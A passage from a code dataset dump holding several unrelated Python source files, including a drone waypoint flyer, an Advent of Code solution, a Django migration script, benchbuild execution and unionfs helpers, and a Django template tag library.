+{"seq_id":"161649214","text":"#!/usr/bin/env python\n\n\"\"\"\nShow all tools in bin directory.\n\nUsage:\n show_bin -h | --help\n show_bin [-v | --verbose]\n\nOptions:\n -h, --help Show this help message and exit.\n -v, --verbose Show detailed help of bin tools.\n\"\"\"\n\nimport os\nimport sys\nfrom docopt import docopt\n\n\ndef main(args):\n \"\"\"Show all tools in bin directory.\"\"\"\n USER = os.path.expanduser('~')\n BIN = os.path.join(USER, 'bin')\n files = [fname for fname in os.listdir(BIN)\n if os.path.isfile(os.path.join(BIN, fname))]\n if \"connect\" in files:\n files.remove('connect')\n print(\"# Tools located in bin directory\")\n for filename in sorted(files):\n filename_no_ext = str(filename).split(\".\")[0]\n if args['--verbose']:\n doc_string = __import__(filename_no_ext).__doc__.splitlines()\n if len(doc_string) == 1:\n print(\"{0:15}: {1}\".format(filename_no_ext, doc_string[0]))\n else:\n print(\"{0:15}: {1}\".format(filename_no_ext, doc_string[1]))\n else:\n print(filename)\n\n\nif __name__ == '__main__':\n args = (docopt(__doc__, version='show_bin 0.1'))\n sys.exit(main(args))\n","sub_path":"bin/show_bin.py","file_name":"show_bin.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"88707591","text":"import argparse\nimport time\nfrom enum import Enum\n\nimport numpy as np\n\nfrom udacidrone import Drone\nfrom udacidrone.connection import MavlinkConnection, WebSocketConnection # noqa: F401\nfrom udacidrone.messaging import MsgID\n\n\nclass States(Enum):\n MANUAL = 0\n ARMING = 1\n TAKEOFF = 2\n WAYPOINT = 3\n LANDING = 4\n DISARMING = 5\n\n\nclass BackyardFlyer(Drone):\n\n def __init__(self, connection):\n super().__init__(connection)\n self.target_position = np.array([0.0, 0.0, 0.0])\n self.all_waypoints = []\n self.in_mission = True\n self.check_state = {}\n self.target_altitude = 3.0\n self.box_size = 10.0 # length in meters of each side of box to navigate\n\n # initial state\n self.flight_state = States.MANUAL\n\n # Register all your callbacks here\n self.register_callback(MsgID.LOCAL_POSITION, self.local_position_callback)\n self.register_callback(MsgID.STATE, self.state_callback)\n\n def local_position_callback(self):\n \"\"\"\n This triggers when `MsgID.LOCAL_POSITION` is received and\n self.local_position contains new data\n \"\"\"\n if self.flight_state == States.TAKEOFF:\n # on takeoff, check when altitude is 95% of target before box nav start\n if -self.local_position[2] > 0.95 * self.target_position[2]:\n self.all_waypoints = self.calculate_box()\n self.waypoint_transition()\n elif self.flight_state == States.WAYPOINT:\n # if drone within 1 meter of target location (excluding heading, altitude positions), transition state\n if np.linalg.norm(self.target_position[0:2] - self.local_position[0:2]) < 1.0:\n # move to next waypoint if nav not finished, else land\n if self.all_waypoints:\n self.waypoint_transition()\n else:\n if np.linalg.norm(self.local_velocity[0:2]) < 1.0:\n self.landing_transition()\n elif self.flight_state == States.LANDING:\n # when landing and drone at start altitude + altitude < 0.1m, disarm\n if self.global_position[2] - self.global_home[2] < 0.1:\n if abs(self.local_position[2]) < 0.1:\n self.disarming_transition()\n\n def state_callback(self):\n \"\"\"\n This triggers when `MsgID.STATE` is received and self.armed and self.guided contain new data\n \"\"\"\n if self.in_mission:\n if self.flight_state == States.MANUAL:\n self.arming_transition()\n elif self.flight_state == States.ARMING:\n if self.armed:\n self.takeoff_transition()\n elif self.flight_state == States.DISARMING:\n if ~self.armed & ~self.guided:\n self.manual_transition()\n\n def calculate_box(self):\n \"\"\"\n Returns waypoints to fly a box clockwise\n \"\"\"\n # Waypoints in form (N, E, altitute, radians)\n box_coordinates = [ [self.box_size, 0.0, self.target_altitude, 0.0],\n [self.box_size, self.box_size, self.target_altitude, 0.0],\n [0.0, self.box_size, self.target_altitude, 0.0],\n [0.0, 0.0, self.target_altitude, 0.0] ]\n return box_coordinates\n\n def arming_transition(self):\n \"\"\"\n Take control of drone, arm, set home location, transition states\n \"\"\"\n drone.take_control() # Take control of the drone\n drone.arm() # Pass an arming command\n self.set_home_position(*self.global_position[0:3]) # Set the home location to current position\n self.flight_state = States.ARMING # Transition to the ARMING state\n\n def takeoff_transition(self):\n \"\"\"\n Set target altitute, takeoff, transition states\n \"\"\"\n print(\"takeoff transition\")\n self.target_position[2] = self.target_altitude # Set target_position altitude\n self.takeoff(self.target_altitude) # Command a takeoff\n self.flight_state = States.TAKEOFF # Transition to the TAKEOFF state\n\n def waypoint_transition(self):\n \"\"\"\n Command the next waypoint position and transition states\n \"\"\"\n print(\"waypoint transition\")\n self.target_position = self.all_waypoints.pop(0) # next position\n # set nav needed to reach next location - N, E, altitude, heading (radians)\n self.cmd_position(*self.target_position)\n self.flight_state = States.WAYPOINT # Transition to WAYPOINT state\n\n def landing_transition(self):\n \"\"\"\n Land drone and transition states\n \"\"\"\n print(\"landing transition\")\n self.land() # land drone\n self.flight_state = States.LANDING # transition states to LANDING state\n\n def disarming_transition(self):\n \"\"\"\n Disarm drone and transition states\n \"\"\"\n print(\"disarm transition\")\n self.disarm() # disarm drone\n self.flight_state = States.DISARMING # Transition to DISARMING state\n\n def manual_transition(self):\n \"\"\"\n 1. Release control of the drone\n 2. Stop the connection (and telemetry log)\n 3. End the mission\n 4. Transition to the MANUAL state\n \"\"\"\n print(\"manual transition\")\n self.release_control()\n self.stop()\n self.in_mission = False\n self.flight_state = States.MANUAL\n\n def start(self):\n \"\"\"\n 1. Open a log file\n 2. Start the drone connection\n 3. Close the log file\n \"\"\"\n print(\"Creating log file\")\n self.start_log(\"Logs\", \"NavLog.txt\")\n print(\"starting connection\")\n self.connection.start()\n print(\"Closing log file\")\n self.stop_log()\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('--port', type=int, default=5760, help='Port number')\n parser.add_argument('--host', type=str, default='127.0.0.1', help=\"host address, i.e. '127.0.0.1'\")\n args = parser.parse_args()\n\n conn = MavlinkConnection('tcp:{0}:{1}'.format(args.host, args.port), threaded=False, PX4=False)\n #conn = WebSocketConnection('ws://{0}:{1}'.format(args.host, args.port))\n drone = BackyardFlyer(conn)\n time.sleep(2)\n drone.start()\n","sub_path":"backyard_flyer.py","file_name":"backyard_flyer.py","file_ext":"py","file_size_in_byte":6350,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"447420185","text":"#!/usr/bin/env python3.6\nimport argparse\n\ndef generator(start, factor, filter_val):\n value = start\n\n while True:\n value = (value * factor) % 2147483647\n if value % filter_val == 0:\n yield value\n\nparser = argparse.ArgumentParser(\n description='Solution for part 2 of day 15')\nparser.add_argument('start_a', metavar='start_a', type=int)\nparser.add_argument('factor_a', metavar='factor_a', type=int)\nparser.add_argument('filter_a', metavar='filter_a', type=int)\nparser.add_argument('start_b', metavar='start_b', type=int)\nparser.add_argument('factor_b', metavar='factor_b', type=int)\nparser.add_argument('filter_b', metavar='filter_b', type=int)\n\nargs = parser.parse_args()\n\ngen_a = generator(args.start_a, args.factor_a, args.filter_a)\ngen_b = generator(args.start_b, args.factor_b, args.filter_b)\n\nmatches = 0\nfor i in range(5000000):\n val_a = next(gen_a)\n val_b = next(gen_b)\n\n if (val_a & 0xFFFF) == (val_b & 0xFFFF):\n matches += 1\n\nprint(matches)\n","sub_path":"day15/generator_filter/generator_filter.py","file_name":"generator_filter.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"74222788","text":"from django.db import transaction\n\nfrom api.management.data_script import OperationalDataScript\nfrom api.models.ProvisionOfTheAct import ProvisionOfTheAct\n\n\nclass UpdateProvisionsOfTheAct(OperationalDataScript):\n \"\"\"\n Updates the effective dates for the provisions of the act,\n so it follows our pattern with the other credit calculation\n tables\n \"\"\"\n is_revertable = False\n comment = 'Updates the Provisions of the Act effective dates and order'\n\n def check_run_preconditions(self):\n return True\n\n @transaction.atomic\n def run(self):\n provisions = ProvisionOfTheAct.objects.order_by('description')\n display_order = 1\n\n for provision in provisions:\n provision.display_order = display_order\n provision.effective_date = \"2017-01-01\"\n provision.expiration_date = None\n provision.save()\n\n display_order += 1\n\nscript_class = UpdateProvisionsOfTheAct\n","sub_path":"backend/api/fixtures/operational/0015_update_provisions_of_the_act.py","file_name":"0015_update_provisions_of_the_act.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"385917402","text":"\"\"\"Experiment helpers.\"\"\"\nimport enum\nimport logging\nimport os\nimport subprocess\nimport sys\nimport typing as t\nfrom contextlib import contextmanager\n\nfrom plumbum import TEE, local\nfrom plumbum.commands import ProcessExecutionError\n\nimport attr\nimport benchbuild.signals as signals\nfrom benchbuild import settings\nfrom benchbuild.settings import CFG\nfrom benchbuild.utils.cmd import mkdir\nfrom benchbuild.utils.path import list_to_path\n\nLOG = logging.getLogger(__name__)\n\n\ndef fetch_time_output(marker, format_s, ins):\n \"\"\"\n Fetch the output /usr/bin/time from a.\n\n Args:\n marker: The marker that limits the time output\n format_s: The format string used to parse the timings\n ins: A list of lines we look for the output.\n\n Returns:\n A list of timing tuples\n \"\"\"\n from parse import parse\n\n timings = [x for x in ins if marker in x]\n res = [parse(format_s, t) for t in timings]\n return [_f for _f in res if _f]\n\n\ndef begin_run_group(project):\n \"\"\"\n Begin a run_group in the database.\n\n A run_group groups a set of runs for a given project. This models a series\n of runs that form a complete binary runtime test.\n\n Args:\n project: The project we begin a new run_group for.\n\n Returns:\n ``(group, session)`` where group is the created group in the\n database and session is the database session this group lives in.\n \"\"\"\n from benchbuild.utils.db import create_run_group\n from datetime import datetime\n\n group, session = create_run_group(project)\n group.begin = datetime.now()\n group.status = 'running'\n\n session.commit()\n return group, session\n\n\ndef end_run_group(group, session):\n \"\"\"\n End the run_group successfully.\n\n Args:\n group: The run_group we want to complete.\n session: The database transaction we will finish.\n \"\"\"\n from datetime import datetime\n\n group.end = datetime.now()\n group.status = 'completed'\n session.commit()\n\n\ndef fail_run_group(group, session):\n \"\"\"\n End the run_group unsuccessfully.\n\n Args:\n group: The run_group we want to complete.\n session: The database transaction we will finish.\n \"\"\"\n from datetime import datetime\n\n group.end = datetime.now()\n group.status = 'failed'\n session.commit()\n\n\n@attr.s(cmp=False)\nclass RunInfo(object):\n \"\"\"\n Execution context of wrapped binaries.\n\n Execution of tracked binaries is guarded with this context\n object. In here we store everything about a single binary\n execution for consumption of an experiment.\n\n Attributes:\n cmd ():\n failed ():\n project ():\n experiment ():\n retcode ():\n stdout ():\n stderr ():\n db_run ():\n session ():\n \"\"\"\n\n def __begin(self, command, project, ename, group):\n \"\"\"\n Begin a run in the database log.\n\n Args:\n command: The command that will be executed.\n pname: The project name we belong to.\n ename: The experiment name we belong to.\n group: The run group we belong to.\n\n Returns:\n (run, session), where run is the generated run instance and\n session the associated transaction for later use.\n \"\"\"\n from benchbuild.utils.db import create_run\n from benchbuild.utils import schema as s\n from datetime import datetime\n\n db_run, session = create_run(command, project, ename, group)\n db_run.begin = datetime.now()\n db_run.status = 'running'\n log = s.RunLog()\n log.run_id = db_run.id\n log.begin = datetime.now()\n log.config = repr(CFG)\n session.add(log)\n session.add(db_run)\n\n self.db_run = db_run\n self.session = session\n\n def __end(self, stdout, stderr):\n \"\"\"\n End a run in the database log (Successfully).\n\n This will persist the log information in the database and commit the\n transaction.\n\n Args:\n db_run: The ``run`` schema object we belong to\n session: The db transaction we belong to.\n stdout: The stdout we captured of the run.\n stderr: The stderr we capture of the run.\n \"\"\"\n from benchbuild.utils.schema import RunLog\n from datetime import datetime\n\n run_id = self.db_run.id\n\n log = self.session.query(RunLog).filter(RunLog.run_id == run_id).one()\n log.stderr = stderr\n log.stdout = stdout\n log.status = 0\n log.end = datetime.now()\n\n self.db_run.end = datetime.now()\n self.db_run.status = 'completed'\n self.session.add(log)\n self.session.add(self.db_run)\n\n def __fail(self, retcode, stdout, stderr):\n \"\"\"\n End a run in the database log (Unsuccessfully).\n\n This will persist the log information in the database and commit the\n transaction.\n\n Args:\n db_run: The ``run`` schema object we belong to\n session: The db transaction we belong to.\n retcode: The return code we captured of the run.\n stdout: The stdout we captured of the run.\n stderr: The stderr we capture of the run.\n \"\"\"\n from benchbuild.utils.schema import RunLog\n from datetime import datetime\n run_id = self.db_run.id\n\n log = self.session.query(RunLog).filter(RunLog.run_id == run_id).one()\n log.stderr = stderr\n log.stdout = stdout\n log.status = retcode\n log.end = datetime.now()\n\n self.db_run.end = datetime.now()\n self.db_run.status = 'failed'\n self.failed = True\n self.session.add(log)\n self.session.add(self.db_run)\n\n cmd = attr.ib(default=None, repr=False)\n failed = attr.ib(default=False)\n project = attr.ib(default=None, repr=False)\n experiment = attr.ib(default=None, repr=False)\n retcode = attr.ib(default=0)\n stdout = attr.ib(default=attr.Factory(list), repr=False)\n stderr = attr.ib(default=attr.Factory(list), repr=False)\n\n db_run = attr.ib(init=False, default=None)\n session = attr.ib(init=False, default=None, repr=False)\n\n def __attrs_post_init__(self):\n self.__begin(self.cmd, self.project, self.experiment.name,\n self.project.run_uuid)\n signals.handlers.register(self.__fail, 15, \"SIGTERM\", \"SIGTERM\")\n\n run_id = self.db_run.id\n settings.CFG[\"db\"][\"run_id\"] = run_id\n\n def __add__(self, rhs):\n if rhs is None:\n return self\n\n new_run_info = RunInfo(\n retcode=self.retcode + rhs.retcode,\n stdout=self.stdout + rhs.stdout,\n stderr=self.stderr + rhs.stderr,\n db_run=[self.db_run, rhs.db_run],\n session=self.session)\n return new_run_info\n\n @property\n def has_failed(self):\n \"\"\"Check, whether this run failed.\"\"\"\n return self.failed\n\n def __call__(self, *args, expected_retcode=0, ri=None, **kwargs):\n cmd_env = settings.CFG.to_env_dict()\n\n with local.env(**cmd_env):\n try:\n bin_name = sys.argv[0]\n retcode, stdout, stderr = \\\n self.cmd & TEE(retcode=expected_retcode)\n f_stdout = bin_name + \".stdout\"\n f_stderr = bin_name + \".stderr\"\n with open(f_stdout, 'w') as fd_stdout:\n fd_stdout.write(stdout)\n\n with open(f_stderr, 'w') as fd_stderr:\n fd_stderr.write(stderr)\n\n self.retcode = retcode\n self.stdout = stdout\n self.stderr = stderr\n self.__end(str(stdout), str(stderr))\n except ProcessExecutionError as ex:\n self.__fail(ex.retcode, ex.stderr, ex.stdout)\n self.retcode = ex.retcode\n self.stdout = ex.stdout\n self.stderr = ex.stderr\n\n LOG.debug(\"Tracked process failed\")\n LOG.error(str(ex))\n except KeyboardInterrupt:\n self.retcode = retcode\n self.stdout = stdout\n self.stderr = stderr\n self.__fail(-1, \"\", \"KeyboardInterrupt\")\n LOG.warning(\"Interrupted by user input\")\n raise\n finally:\n signals.handlers.deregister(self.__fail)\n\n return self\n\n def commit(self):\n self.session.commit()\n\n\ndef exit_code_from_run_infos(run_infos: t.List[RunInfo]) -> int:\n \"\"\"Generate a single exit code from a list of RunInfo objects.\n\n Takes a list of RunInfos and returns the exit code that is furthest away\n from 0.\n\n Args:\n run_infos (t.List[RunInfo]): [description]\n\n Returns:\n int: [description]\n \"\"\"\n assert run_infos is not None\n\n if not hasattr(run_infos, \"__iter__\"):\n return run_infos.retcode\n\n rcs = [ri.retcode for ri in run_infos]\n max_rc = max(rcs)\n min_rc = min(rcs)\n if max_rc == 0:\n return min_rc\n return max_rc\n\n\n@contextmanager\ndef track_execution(cmd, project, experiment, **kwargs):\n \"\"\"Guard the execution of the given command.\n\n The given command (`cmd`) will be executed inside a database context.\n As soon as you leave the context we will commit the transaction.\n Any necessary modifications to the database can be identified inside\n the context with the RunInfo object.\n\n Args:\n cmd: The command we guard.\n project: The project we track for.\n experiment: The experiment we track for.\n\n Yields:\n RunInfo: A context object that carries the necessary\n database transaction.\n \"\"\"\n\n runner = RunInfo(cmd=cmd, project=project, experiment=experiment, **kwargs)\n yield runner\n runner.commit()\n\n\ndef run(command, retcode=0):\n \"\"\"Execute a plumbum command, depending on the user's settings.\n\n Args:\n command: The plumbumb command to execute.\n \"\"\"\n return command & TEE(retcode=retcode)\n\n\nclass UchrootEC(enum.Enum):\n MNT_FAILED = 255\n MNT_PROC_FAILED = 254\n MNT_DEV_FAILED = 253\n MNT_SYS_FAILED = 252\n MNT_PTS_FAILED = 251\n\n\ndef retry(pb_cmd, retries=0, max_retries=10, retcode=0, retry_retcodes=None):\n try:\n run(pb_cmd, retcode)\n except ProcessExecutionError as proc_ex:\n new_retcode = proc_ex.retcode\n if retries > max_retries:\n LOG.error(\"Retried %d times. No change. Abort\", retries)\n raise\n\n if new_retcode in retry_retcodes:\n retry(\n pb_cmd,\n retries=retries + 1,\n max_retries=max_retries,\n retcode=retcode,\n retry_retcodes=retry_retcodes)\n else:\n raise\n\n\ndef uretry(cmd, retcode=0):\n retry(\n cmd,\n retcode=retcode,\n retry_retcodes=[\n UchrootEC.MNT_PROC_FAILED.value, UchrootEC.MNT_DEV_FAILED.value,\n UchrootEC.MNT_SYS_FAILED.value, UchrootEC.MNT_PTS_FAILED.value\n ])\n\n\ndef uchroot_no_args():\n \"\"\"Return the uchroot command without any customizations.\"\"\"\n from benchbuild.utils.cmd import uchroot as uchrt\n\n prefixes = CFG[\"container\"][\"prefixes\"].value()\n p_paths, p_libs = uchroot_env(prefixes)\n uchrt = with_env_recursive(\n uchrt,\n LD_LIBRARY_PATH=list_to_path(p_libs),\n PATH=list_to_path(p_paths))\n\n return uchrt\n\n\ndef uchroot_no_llvm(*args, **kwargs):\n \"\"\"\n Return a customizable uchroot command.\n\n The command will be executed inside a uchroot environment.\n\n Args:\n args: List of additional arguments for uchroot (typical: mounts)\n Return:\n chroot_cmd\n \"\"\"\n uid = kwargs.pop('uid', 0)\n gid = kwargs.pop('gid', 0)\n\n uchroot_cmd = uchroot_no_args()\n uchroot_cmd = uchroot_cmd[\"-C\", \"-w\", \"/\", \"-r\", os.path.abspath(\".\")]\n uchroot_cmd = uchroot_cmd[\"-u\", str(uid), \"-g\", str(gid), \"-E\", \"-A\"]\n return uchroot_cmd[args]\n\n\ndef uchroot_mounts(prefix, mounts):\n \"\"\"\n Compute the mountpoints of the current user.\n\n Args:\n prefix: Define where the job was running if it ran on a cluster.\n mounts: All mounts the user currently uses in his file system.\n Return:\n mntpoints\n \"\"\"\n i = 0\n mntpoints = []\n for mount in mounts:\n if not isinstance(mount, dict):\n mntpoint = \"{0}/{1}\".format(prefix, str(i))\n mntpoints.append(mntpoint)\n i = i + 1\n return mntpoints\n\n\ndef _uchroot_mounts(prefix, mounts, uchrt):\n i = 0\n new_uchroot = uchrt\n mntpoints = []\n for mount in mounts:\n src_mount = mount\n if isinstance(mount, dict):\n src_mount = mount[\"src\"]\n tgt_mount = mount[\"tgt\"]\n else:\n tgt_mount = \"{0}/{1}\".format(prefix, str(i))\n i = i + 1\n mkdir(\"-p\", tgt_mount)\n new_uchroot = new_uchroot[\"-M\", \"{0}:/{1}\".format(\n src_mount, tgt_mount)]\n mntpoints.append(tgt_mount)\n return new_uchroot, mntpoints\n\n\ndef uchroot_env(mounts):\n \"\"\"\n Compute the environment of the change root for the user.\n\n Args:\n mounts: The mountpoints of the current user.\n Return:\n paths\n ld_libs\n \"\"\"\n f_mounts = [m.strip(\"/\") for m in mounts]\n\n ld_libs = [\"/{0}/lib\".format(m) for m in f_mounts]\n ld_libs.extend([\"/{0}/lib64\".format(m) for m in f_mounts])\n\n paths = [\"/{0}/bin\".format(m) for m in f_mounts]\n paths.extend([\"/{0}/sbin\".format(m) for m in f_mounts])\n paths.extend([\"/{0}\".format(m) for m in f_mounts])\n return paths, ld_libs\n\n\ndef with_env_recursive(cmd, **envvars):\n \"\"\"\n Recursively updates the environment of cmd and all its subcommands.\n\n Args:\n cmd - A plumbum command-like object\n **envvars - The environment variables to update\n\n Returns:\n The updated command.\n \"\"\"\n from plumbum.commands.base import BoundCommand, BoundEnvCommand\n if isinstance(cmd, BoundCommand):\n cmd.cmd = with_env_recursive(cmd.cmd, **envvars)\n elif isinstance(cmd, BoundEnvCommand):\n cmd.envvars.update(envvars)\n cmd.cmd = with_env_recursive(cmd.cmd, **envvars)\n return cmd\n\n\ndef uchroot_with_mounts(*args, **kwargs):\n \"\"\"Return a uchroot command with all mounts enabled.\"\"\"\n uchroot_cmd = uchroot_no_args(*args, **kwargs)\n uchroot_cmd, mounts = \\\n _uchroot_mounts(\"mnt\", CFG[\"container\"][\"mounts\"].value(), uchroot_cmd)\n paths, libs = uchroot_env(mounts)\n\n prefixes = CFG[\"container\"][\"prefixes\"].value()\n p_paths, p_libs = uchroot_env(prefixes)\n\n uchroot_cmd = with_env_recursive(\n uchroot_cmd,\n LD_LIBRARY_PATH=list_to_path(libs + p_libs),\n PATH=list_to_path(paths + p_paths))\n return uchroot_cmd\n\n\ndef uchroot(*args, **kwargs):\n \"\"\"\n Return a customizable uchroot command.\n\n Args:\n args: List of additional arguments for uchroot (typical: mounts)\n Return:\n chroot_cmd\n \"\"\"\n mkdir(\"-p\", \"llvm\")\n uchroot_cmd = uchroot_no_llvm(*args, **kwargs)\n uchroot_cmd, mounts = _uchroot_mounts(\n \"mnt\", CFG[\"container\"][\"mounts\"].value(), uchroot_cmd)\n paths, libs = uchroot_env(mounts)\n p_paths, p_libs = uchroot_env(CFG[\"container\"][\"prefixes\"].value())\n\n uchroot_cmd = uchroot_cmd.with_env(\n LD_LIBRARY_PATH=list_to_path(libs + p_libs),\n PATH=list_to_path(paths + p_paths))\n return uchroot_cmd[\"--\"]\n\n\ndef in_builddir(sub='.'):\n \"\"\"\n Decorate a project phase with a local working directory change.\n\n Args:\n sub: An optional subdirectory to change into.\n \"\"\"\n from functools import wraps\n from os import path\n\n def wrap_in_builddir(func):\n \"\"\"Wrap the function for the new build directory.\"\"\"\n\n @wraps(func)\n def wrap_in_builddir_func(self, *args, **kwargs):\n \"\"\"The actual function inside the wrapper for the new builddir.\"\"\"\n p = path.abspath(path.join(self.builddir, sub))\n try:\n with local.cwd(p):\n return func(self, *args, **kwargs)\n except FileNotFoundError:\n LOG.debug(\"Chdir to %s failed. Directory does not exist.\", p)\n\n return wrap_in_builddir_func\n\n return wrap_in_builddir\n\n\ndef unionfs_set_up(ro_base, rw_image, mountpoint):\n \"\"\"\n Setup a unionfs via unionfs-fuse.\n\n Args:\n ro_base: base_directory of the project\n rw_image: virtual image of actual file system\n mountpoint: location where ro_base and rw_image merge\n \"\"\"\n if not os.path.exists(mountpoint):\n mkdir(\"-p\", mountpoint)\n if not os.path.exists(ro_base):\n LOG.error(\"Base dir does not exist: '%s'\", ro_base)\n raise ValueError(\"Base directory does not exist\")\n if not os.path.exists(rw_image):\n LOG.error(\"Image dir does not exist: '%s'\", ro_base)\n raise ValueError(\"Image directory does not exist\")\n\n from benchbuild.utils.cmd import unionfs as unionfs_cmd\n ro_base = os.path.abspath(ro_base)\n rw_image = os.path.abspath(rw_image)\n mountpoint = os.path.abspath(mountpoint)\n return unionfs_cmd[\"-f\", \"-o\", \"auto_unmount,allow_other,cow\",\n rw_image + \"=RW:\" + ro_base + \"=RO\", mountpoint]\n\n\ndef unionfs_is_active(root):\n import psutil\n\n real_root = os.path.realpath(root)\n for part in psutil.disk_partitions(all=True):\n if os.path.commonpath([part.mountpoint, real_root]) == real_root:\n if part.fstype in [\"fuse.unionfs\", \"fuse.unionfs-fuse\"]:\n return True\n return False\n\n\nclass UnmountError(BaseException):\n pass\n\n\ndef unionfs(base_dir='./base',\n image_dir='./image',\n image_prefix=None,\n mountpoint='./union'):\n \"\"\"\n Decorator for the UnionFS feature.\n\n This configures a unionfs for projects. The given base_dir and/or image_dir\n are layered as follows:\n image_dir=RW:base_dir=RO\n All writes go to the image_dir, while base_dir delivers the (read-only)\n versions of the rest of the filesystem.\n\n The unified version will be provided in the project's builddir. Unmouting\n is done as soon as the function completes.\n\n Args:\n base_dir:The unpacked container of a project delievered by a method\n out of the container utils.\n image_dir: Virtual image of the actual file system represented by the\n build_dir of a project.\n image_prefix: Useful prefix if the projects run on a cluster,\n to identify where the job came from and where it runs.\n mountpoint: Location where the filesystems merge, currently per default\n as './union'.\n \"\"\"\n from functools import wraps\n\n def update_cleanup_paths(new_path):\n \"\"\"\n Add the new path to the list of paths to clean up afterwards.\n\n Args:\n new_path: Path to the directory that need to be cleaned up.\n \"\"\"\n cleanup_dirs = settings.CFG[\"cleanup_paths\"].value()\n cleanup_dirs = set(cleanup_dirs)\n cleanup_dirs.add(new_path)\n cleanup_dirs = list(cleanup_dirs)\n settings.CFG[\"cleanup_paths\"] = cleanup_dirs\n\n def is_outside_of_builddir(project, path_to_check):\n \"\"\"Check if a project lies outside of its expected directory.\"\"\"\n bdir = project.builddir\n cprefix = os.path.commonprefix([path_to_check, bdir])\n return cprefix != bdir\n\n def wrap_in_union_fs(func):\n \"\"\"\n Function that wraps a given function inside the file system.\n\n Args:\n func: The function that needs to be wrapped inside the unions fs.\n Return:\n The file system with the function wrapped inside.\n \"\"\"\n nonlocal image_prefix\n\n @wraps(func)\n def wrap_in_union_fs_func(project, *args, **kwargs):\n \"\"\"\n Wrap the func in the UnionFS mount stack.\n\n We make sure that the mount points all exist and stack up the\n directories for the unionfs. All directories outside of the default\n build environment are tracked for deletion.\n \"\"\"\n container = project.container\n abs_base_dir = os.path.abspath(container.local)\n nonlocal image_prefix\n if image_prefix is not None:\n image_prefix = os.path.abspath(image_prefix)\n rel_prj_builddir = os.path.relpath(\n project.builddir, str(settings.CFG[\"build_dir\"]))\n abs_image_dir = os.path.abspath(\n os.path.join(image_prefix, rel_prj_builddir, image_dir))\n\n if is_outside_of_builddir(project, abs_image_dir):\n update_cleanup_paths(abs_image_dir)\n else:\n abs_image_dir = os.path.abspath(\n os.path.join(project.builddir, image_dir))\n abs_mount_dir = os.path.abspath(\n os.path.join(project.builddir, mountpoint))\n if not os.path.exists(abs_base_dir):\n mkdir(\"-p\", abs_base_dir)\n if not os.path.exists(abs_image_dir):\n mkdir(\"-p\", abs_image_dir)\n if not os.path.exists(abs_mount_dir):\n mkdir(\"-p\", abs_mount_dir)\n\n unionfs_cmd = unionfs_set_up(abs_base_dir, abs_image_dir,\n abs_mount_dir)\n project_builddir_bak = project.builddir\n project.builddir = abs_mount_dir\n\n proc = unionfs_cmd.popen()\n while (not unionfs_is_active(root=abs_mount_dir)) and \\\n (proc.poll() is None):\n pass\n\n ret = None\n if proc.poll() is None:\n try:\n with local.cwd(abs_mount_dir):\n ret = func(project, *args, **kwargs)\n finally:\n project.builddir = project_builddir_bak\n\n from signal import SIGINT\n is_running = proc.poll() is None\n while unionfs_is_active(root=abs_mount_dir) and is_running:\n try:\n proc.send_signal(SIGINT)\n proc.wait(timeout=3)\n except subprocess.TimeoutExpired:\n proc.kill()\n is_running = False\n LOG.debug(\"Unionfs shut down.\")\n\n if unionfs_is_active(root=abs_mount_dir):\n raise UnmountError()\n\n return ret\n\n return wrap_in_union_fs_func\n\n return wrap_in_union_fs\n\n\ndef store_config(func):\n \"\"\"Decorator for storing the configuration in the project's builddir.\"\"\"\n from functools import wraps\n\n @wraps(func)\n def wrap_store_config(self, *args, **kwargs):\n \"\"\"Wrapper that contains the actual storage call for the config.\"\"\"\n p = os.path.abspath(os.path.join(self.builddir))\n CFG.store(os.path.join(p, \".benchbuild.yml\"))\n return func(self, *args, **kwargs)\n\n return wrap_store_config\n","sub_path":"benchbuild/utils/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":23145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"96252548","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /Users/pjs/python-modules/webutils/djtools/templatetags/djtools_util.py\n# Compiled at: 2016-05-17 14:52:55\nfrom django import template\nregister = template.Library()\n\n@register.filter\ndef tabularize(value, cols):\n \"\"\"\n modifies a list to become a list of lists \n eg [1,2,3,4] becomes [[1,2], [3,4]] with an argument of 2\n Taken from django user group\n\n Usage:\n {% for row in object_list|tabularize:\"4\" %}\n {% for obj in row %}\n ....\n {% endfor %}\n {% endfor %}\n \"\"\"\n try:\n cols = int(cols)\n except ValueError:\n return [\n value]\n\n return map(*([None] + [ value[i::cols] for i in range(0, cols) ]))\n\n\nclass MapTranslateNode(template.Node):\n\n def __init__(self, data, src_variables, variable_name):\n self.data = data\n self.src_variables = src_variables\n self.variable_name = variable_name\n\n def render(self, context):\n from webutils.helpers import map_translate\n data = template.Variable(self.data).resolve(context)\n src_variables = [ template.Variable(x).resolve(context) for x in self.src_variables ]\n new_data = map_translate(data, *src_variables)\n context[self.variable_name] = new_data\n return ''\n\n\n@register.tag\ndef map_translate(parser, token):\n \"\"\" Used to templatize custom data strings. See \n webutils.helpers.map_translate for more details.\n \n Usage:\n \n {% map_translate data_string, source,extra,fields as result_name %}\n \n Will run data_string through map_translate using source (plus extra\n fields) and give the result in the template context as \"result_name\"\n \"\"\"\n try:\n name, data, src_variables, as_, variable_name = token.split_contents()\n except ValueError:\n raise template.TemplateSyntaxError('bad arguments for %r' % token.split_contents()[0])\n\n return MapTranslateNode(data, src_variables.split(','), variable_name)","sub_path":"pycfiles/webutils-0.9.11.tar/djtools_util.py","file_name":"djtools_util.py","file_ext":"py","file_size_in_byte":2164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"139966029","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pickle\nfrom tqdm import tqdm\nimport bounds\nimport nested_utils as nested\nimport distribution_utils as dists\nimport runners\nfrom flags_config import 